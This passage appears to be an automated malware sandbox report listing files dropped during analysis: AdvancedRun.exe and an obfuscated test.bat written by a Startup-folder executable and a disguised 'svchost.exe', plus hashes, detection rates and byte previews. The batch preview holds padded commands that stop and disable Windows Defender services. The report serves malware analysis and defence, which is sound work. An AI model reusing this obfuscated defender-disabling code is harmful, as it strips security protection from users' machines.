                                                                                                                  SHA-512:4A85E798C11A0C4595CF3B42EA064F6F25E916877C39729E9FC6B518FDF4CF2AA843EBE6B9A3A79A30AE1561ED29DB6B2DA212C61AC01E8E08BA517015977511
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @...e...................h.?.(.".x.....c...I..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                   • Antivirus: Metadefender, Detection: 3%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dzsxkm1.gmw.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0k00wotq.d3h.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uko0qtt.v1f.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54v3gsur.dvq.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z51jnmi.3bc.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_afkkkgq1.y0i.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duwzq4u5.ro3.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_grxndcbs.jvz.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5nm0hzg.gxy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0bhscjr.xhy.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mo22qrr4.kn0.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nein1cmy.5m1.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojwwilnd.ypi.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2gw4bjc.itm.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqnhaj14.abr.ps1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5xybjsm.dfn.psm1
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:very short file (no magic)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:U:U
                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: 1
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                   • Antivirus: Metadefender, Detection: 3%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):0
                                                                                                                  Entropy (8bit):0.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                   • Antivirus: Metadefender, Detection: 3%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat
                                                                                                                  Process:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
